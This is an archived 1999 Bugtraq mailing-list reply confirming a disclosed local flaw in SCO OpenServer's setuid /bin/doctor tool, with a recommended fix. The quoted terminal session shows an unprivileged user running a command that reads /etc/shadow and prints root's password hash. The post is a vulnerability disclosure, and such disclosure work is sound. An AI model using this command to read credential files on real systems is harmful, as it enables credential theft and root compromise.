|
Bugtraq
mailing list archives
Re: SCO 5.0.5 /bin/doctor local root comprimise
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Wed, 8 Sep 1999 11:31:57 -0700
confirmed to run under 5.0.4 as well.
On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
Greetings,
INFO:
There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor
script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example:
scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$
And so on.
FIX:
Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime
soon. If a hole like this exists, there are undoubtedly countless more lurking within.
Brock Tellier
Systems Administrator
Webley Systems
--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!
 By Date 
By Thread
Current thread:
| 
Intro
